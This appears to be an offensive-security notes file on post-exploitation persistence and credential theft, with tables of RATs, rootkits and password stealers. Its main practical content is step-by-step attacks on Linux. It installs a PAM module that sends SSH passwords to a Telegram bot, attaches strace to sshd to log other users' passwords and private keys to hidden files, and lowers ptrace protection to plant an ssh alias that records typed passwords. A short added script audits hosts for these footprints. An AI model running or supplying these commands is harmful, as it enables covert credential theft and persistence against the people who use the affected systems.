sec_RAT_post_exploitation.md
Post-exploitation - Persistence

  • Persistence - MITRE ATT&CK™
    • General
      • Abuse of trusted programs - using legitimate files of the system or of ordinary applications to maintain access
      • Web Shell - persistence for as long as the web service is running
      • System accounts - (legitimate functionality, no malicious code involved) login credentials obtained through information gathering, theft, etc.
      • Remote services - (legitimate functionality, no malicious code involved) services that let users connect to internal corporate network resources from outside, such as VPN
    • Windows
      • Create account - (legitimate functionality, no malicious code involved) an attacker with a sufficient access level can create local system or domain accounts
      • Registry - e.g. changing default file associations, creating new services, modifying existing services...
      • DLL Hijacking
      • Accessibility features - abusing the accessibility features of the Windows logon screen
      • Bootkit - modifying the boot sectors of the hard drive, including the Master Boot Record (MBR) and the Volume Boot Record (VBR)
      • Startup folder - files placed in this folder start automatically: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
      • Office application startup - several mechanisms can be used for persistence when an Office-based application starts
      • Shortcut modification - creating a new shortcut or changing the target of an existing one
      • WMI event subscription - attackers can use WMI to subscribe to events and execute arbitrary code when the event occurs
      • ...
    • Linux
      • Create account - (legitimate functionality, no malicious code involved)
      • Rootkit - e.g. an LKM loaded into the Linux kernel
      • Systemd Service - the systemd service manager is commonly used to manage background daemon processes (also called services) and other system resources
      • Port Knocking - sending a pre-agreed packet to a normal port so that the backdoor opens another port with iptables or a similar program
      • .bash_profile and .bashrc - ~/.bash_profile and ~/.bashrc are executed in the user's context when a new shell is opened or the user logs in, so that the environment is set up correctly; ~/.bash_profile runs for login shells, ~/.bashrc for interactive non-login shells
      • ...
    • macOS
      • plist modification - Property list (plist) files hold all the information macOS uses to configure applications and services
      • Dylib hijacking - (analogous to Windows DLL hijacking) macOS searches for the dynamic libraries (dylib) a program needs; a program that specifies an ambiguous path and does not use the Library Validation mechanism is easy for an attacker to abuse
      • ...

Persistence-related projects

| Name | Attributes | Target | Description |
|---|---|---|---|
| gentilkiwi/mimikatz | C | Windows | 7k★ Extracts plaintext passwords / hashes / PIN codes / Kerberos tickets from memory |
| PowerShellMafia/PowerSploit | PowerShell | Windows | 5k★ General purpose. A PowerShell Post-Exploitation Framework: code execution, persistence, AV bypass, privilege escalation, information gathering |
| samratashok/nishang | PowerShell | Windows | 3k★ General purpose, useful in every phase of a penetration test |
| secabstraction/PowerCat | PowerShell | Windows | A netcat-like TCP/IP Swiss army knife. Features: File Transfer, Shells, UDP and SMB, SSL, Relays, Generate Payloads, Misc |
| bitsadmin/nopowershell | C# | Windows | PowerShell rebuilt in C#; none of the PowerShell logging mechanisms record it. Copying NoPowerShell.exe and NoPowerShell.cna into Cobalt Strike's scripts folder allows commands to be executed from memory. Can also be run through rundll32 |
| zerosum0x0/koadic | python | Windows | 1k★ Koadic C3 COM Command & Control - JScript RAT |
| n1nj4sec/pupy | python2 | Windows/Linux | 4k★ #RAT Pupy is a cross-platform remote administration and post-exploitation tool |
| EggShell | python | macOS/Linux | #RAT iOS (jailbroken) / macOS / Linux (file management only) |
| Ne0nd0g/merlin | golang | all | 2k★ #RAT [BlackHat tools] a cross-platform post-exploitation [HTTP/2] Command & Control server and agent |
| tiagorlampert/CHAOS | golang | all | 1k★ #RAT cross-platform keylogger |
| rek7/fireELF | python | Linux | #Fileless Runs a Linux ELF executable entirely from memory without touching disk (see the referenced write-up for the principle) |
| fbkcs/ThunderDNS | python3/PowerShell/bash | Linux/Win | #backdoor Forwards TCP traffic over the DNS protocol, supports socks5 |
| dnscat2 | C++ C Ruby | Linux Win32 | #backdoor #DNS |
| backdoors | sh | Linux | #backdoor Analysis of a backdoor triggered through SSH logs |
| outflanknl/EvilClippy | C# | Windows | Generates Office files containing shellcode. A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows. |

Post-exploitation - Abuse of trusted programs

  • Abuse of trusted programs: system-supplied programs / ordinary applications
    • DLL Hijacking
    • ...

| Name | Target | Description |
|---|---|---|
| UltimateAppLockerByPassList | Windows | The most common techniques for bypassing AppLocker ("Application Control Policies") |
| LOLBAS | Windows | Attackers abuse Windows' built-in binaries, scripts and libraries for post-exploitation: persistence, file transfer... (project page) |
| GTFOBins | Linux | Attackers abuse the legitimate functions of built-in Linux binaries to bypass local security restrictions during post-exploitation |

Post-exploitation - Logging SSH passwords on Linux with the pam_get_item function and sending them out (https)

The pam_get_item function allows applications and PAM service modules to access and retrieve PAM information of item_type.

https://github.com/mthbernardes/sshLooterC

It can be compiled on your own host and then copied to the victim host.

Dependencies:
gcc
libcurl4-openssl-dev
libpam0g-dev

Configure:
Edit the `looter.c` and add your telegram bot token and your user id.

Compiling:
make

Usage:
Copy the `looter.so` to the infected machine on `/lib/security`, then edit the `/etc/pam.d/common-auth` and add the following lines.

```
auth optional module.so
account optional module.so
```

Post-exploitation - Capturing sshd information (credentials of other users logging into this host)

Capturing plaintext passwords from the sshd process

1. Run as root

```sh
# Run the program in a subshell so it keeps running after the current shell exits
(strace -f -F -p `ps aux | grep "sshd -D" | grep -v grep | awk '{print $2}'` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)
```

2. The regular expression for locating the username and password is read\(6, ".+\\0\\0\\0\\.+"

```sh
# Look for usernames and passwords
grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

# The output looks like this
[pid  2401] 22:34:34 read(6, "\10\0\0\0\4root", 9) = 9
[pid  2401] 22:34:34 read(6, "\4\0\0\0\16ssh-connection\0\0\0\0\0\0\0\0", 27) = 27
[pid  2401] 22:34:34 read(6, "\f\0\0\0\4toor", 9) = 9
```
Capturing private keys from the sshd process

1. Run as root

```sh
# Run the program in a subshell so it keeps running after the current shell exits
(strace -f -F -p `ps aux | grep "sshd -D" | grep -v grep | awk '{print $2}'` -t -e trace=read,write -s 4096 2> /tmp/.sshd.log &)
```
2. To find private keys, search directly for the string PRIVATE KEY

```sh
# Look for private keys (if the private key is passphrase-protected, the passphrase does not seem to be captured)
grep 'PRIVATE KEY' /tmp/.sshd.log

# The output is a single read(...) line carrying the whole "-----BEGIN OPENSSH PRIVATE KEY-----" block (full dump omitted here)
```

Post-exploitation - Using strace on Linux to log the password typed into the local ssh client

Tested successfully on Ubuntu.

Prerequisite: ordinary user privileges are sufficient by default.

Reference: https://www.kernel.org/doc/Documentation/security/Yama.txt

The sysctl settings (writable only with CAP_SYS_PTRACE) are:

0 - classic ptrace permissions: a process can PTRACE_ATTACH to any other
    process running under the same uid, as long as it is dumpable (i.e.
    did not transition uids, start privileged, or have called
    prctl(PR_SET_DUMPABLE...) already). Similarly, PTRACE_TRACEME is
    unchanged.

1 - restricted ptrace: a process must have a predefined relationship
    with the inferior it wants to call PTRACE_ATTACH on. By default,
    this relationship is that of only its descendants when the above
    classic criteria is also met. To change the relationship, an
    inferior can call prctl(PR_SET_PTRACER, debugger, ...) to declare
    an allowed debugger PID to call PTRACE_ATTACH on the inferior.
    Using PTRACE_TRACEME is unchanged.

2 - admin-only attach: only processes with CAP_SYS_PTRACE may use ptrace
    with PTRACE_ATTACH, or through children calling PTRACE_TRACEME.

3 - no attach: no processes may use ptrace with PTRACE_ATTACH nor via
    PTRACE_TRACEME. Once set, this sysctl value cannot be changed.

The original children-only logic was based on the restrictions in grsecurity.

```sh
# Check the current setting (if the value is 3, the system must be rebooted for a change to take effect)
cat /proc/sys/kernel/yama/ptrace_scope

# Change the setting
echo 0 > /proc/sys/kernel/yama/ptrace_scope
# or
sysctl kernel.yama.ptrace_scope=0

# Edit the command aliases
vi ~/.bashrc
# or
vi /etc/bashrc

# Add an alias
alias ssh='strace -o /tmp/.sshpwd-$(date +%d%h%m%s).log -e read,write,connect -s 2048 ssh'

# Make the alias take effect immediately
source ~/.bashrc

# View the correct password
grep "read(5" /tmp/.sshpwd-21Sep091537518282.log | tail -n 11

# View the other input
grep "read(" /tmp/.sshpwd-21Sep091537518282.log | tail -n 11
```
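The two Linux techniques above (the PAM `module.so` entry in `/etc/pam.d/common-auth`, and the `alias ssh=` strace wrapper that only works with `ptrace_scope` 0) leave footprints a host audit can check for. The following script is an added defender-side example, not part of the original notes or of the tools listed: each helper takes a file path so it runs here against constructed sample files, and the `pam_*.so` naming rule is a heuristic, not a PAM guarantee.

```sh
#!/bin/sh
# Added audit helpers (not from the original notes). Each takes a file path so it can be
# exercised on constructed samples; the real files are /etc/pam.d/common-auth,
# ~/.bashrc or /etc/bashrc, and /proc/sys/kernel/yama/ptrace_scope.

# 1. PAM modules with a non-standard name. sshLooterC is installed as
#    "auth optional module.so"; stock modules are named pam_*.so, so anything
#    else (heuristic) is worth inspecting. Handles [bracketed] control fields.
pam_odd_modules() {
    awk '$1 ~ /^-?(auth|account|password|session)$/ {
        i = 3
        if ($2 ~ /^\[/) { while (i <= NF && $(i-1) !~ /\]$/) i++ }
        if ($i !~ /^(\/.*\/)?pam_[A-Za-z0-9_]+\.so$/) print $1, $i
    }' "$1"
}

# 2. An "alias ssh=" that routes the client through strace, as planted in
#    ~/.bashrc or /etc/bashrc in the section above.
ssh_strace_aliases() {
    grep -E '^[[:space:]]*alias[[:space:]]+ssh=.*strace' "$1" || true
}

# 3. Yama ptrace_scope: the client-side capture needs 0; any value >= 1 stops an
#    unrelated same-uid process from attaching. Exit status 0 means restricted.
ptrace_scope_restricted() {
    [ "$(cat "$1")" -ge 1 ]
}

# --- constructed sample inputs, not real host files ---
tmp=$(mktemp -d)
cat > "$tmp/common-auth" <<'EOF'
auth    [success=1 default=ignore]  pam_unix.so nullok_secure
auth    requisite                   pam_deny.so
auth    optional                    module.so
account optional                    module.so
EOF
cat > "$tmp/bashrc" <<'EOF'
alias ll='ls -l'
alias ssh='strace -o /tmp/.sshpwd-$(date +%d%h%m%s).log -e read,write,connect -s 2048 ssh'
EOF
echo 0 > "$tmp/ptrace_scope"

echo "== non-standard PAM modules"; pam_odd_modules "$tmp/common-auth"
echo "== ssh aliases wrapped in strace"; ssh_strace_aliases "$tmp/bashrc"
ptrace_scope_restricted "$tmp/ptrace_scope" || echo "== ptrace_scope is 0: same-uid PTRACE_ATTACH allowed"
rm -rf "$tmp"
```

On a live host, point the helpers at the real paths and treat any hit as a lead to investigate, since a custom-named PAM module can also be legitimate.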

Post-exploitation - Linux rootkits

| Name | Attributes | Target | Description |
|---|---|---|---|
| rootkit m0nad/Diamorphine | C | Linux kernels 2.6.x/3.x/4.x (x86, x86_64) | #backdoor #LKM #rootkit Requires root. Hides specified processes and their communications. |
| rootkit f0rb1dd3n/Reptile | C | Linux | #backdoor #LKM #rootkit Developed with reference to Diamorphine. Tested on Debian 9 / Ubuntu 18.04.1 / CentOS 7 |

Post-exploitation - Information gathering

  • What to collect
    • System - accounts and passwords
    • Browsers - accounts and passwords
    • Mail clients - Outlook, Thunderbird, etc.
    • IM clients - Skype, etc.
    • Database clients - DBVisualizer, PostgreSQL, Robomongo, Squirrel, SQL Developer, etc.
    • RDP - login information saved by the Remote Desktop Connection client: IP, username, password
    • Developer tools - Git for Windows, Tortoise (SVN), Maven, Apache, etc.
    • Administrator tools - Apache Directory Studio, CoreFTP, CyberDuck, FileZilla, FTPNavigator, OpenSSH, OpenVPN, PuttyCM, RDPManager, VNC, WinSCP, Windows Subsystem for Linux, etc.
    • WiFi passwords - Wireless Network profiles, etc.
    • Code and configuration files - useful IPs, ports, users, passwords, mail accounts, tokens... found in code; a code audit of the system may be worthwhile
    • Personal files - .txt .doc .xls etc.
    • ...

| Name | Attributes | Target | Description |
|---|---|---|---|
| LaZagne | python | Windows/Linux/macOS | #Credentials recovery: system passwords / browsers / mail / wifi... lazagne.exe gets detected and removed by AV. Retrieving all credentials takes about 3 minutes. |
| djhohnstein/SharpWeb | C# .exe | Windows | #Browser credential retrieval. .NET 2.0 CLR project. Retrieve All Saved Browser Credentials. |
| GhostPack/Seatbelt | C# | Windows | Collects security-relevant information about the host: AntiVirus / AMSIProviders / ... plus system information |

BypassUAC

UAC (User Account Control) is a security feature introduced in Windows 7 and later versions of Windows. It prevents even a local administrator account from making changes to the operating system unless the user explicitly chooses to allow them. It is very common to see desktop users working with an Administrator account (not recommended, but common), so even if malware running under a compromised local administrator account tries to change something in the registry or create a new service on the system, UAC will not let that happen.

Other articles

Ping Power - ICMP tunnel